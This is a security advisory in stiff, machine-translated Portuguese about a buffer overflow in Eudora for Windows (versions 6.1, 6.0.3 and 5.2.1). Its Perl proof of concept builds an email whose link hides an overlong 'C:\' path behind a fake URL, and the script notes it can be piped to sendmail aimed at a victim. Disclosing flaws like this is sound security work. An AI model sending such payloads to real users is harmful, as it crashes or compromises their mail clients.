As versões 6.1 e 6.0.3 e 5.2.1 do cliente de email Eudora para Windows contém um buffer overflow. Incluso neste artigo você pode encontrar um sample para exploração da falha.

Há um buffer transborda no Eudora ao Windows, verificado em versões
6.1, 6.0.3 e 5.2.1. Isto está facilmente exploitable para correr código arbitrário.
Eu não sei se esta questão afeta Eudora ao Macs.
Demo:
#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";
Cheers,
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
Hosted by www.Geocities.ws

1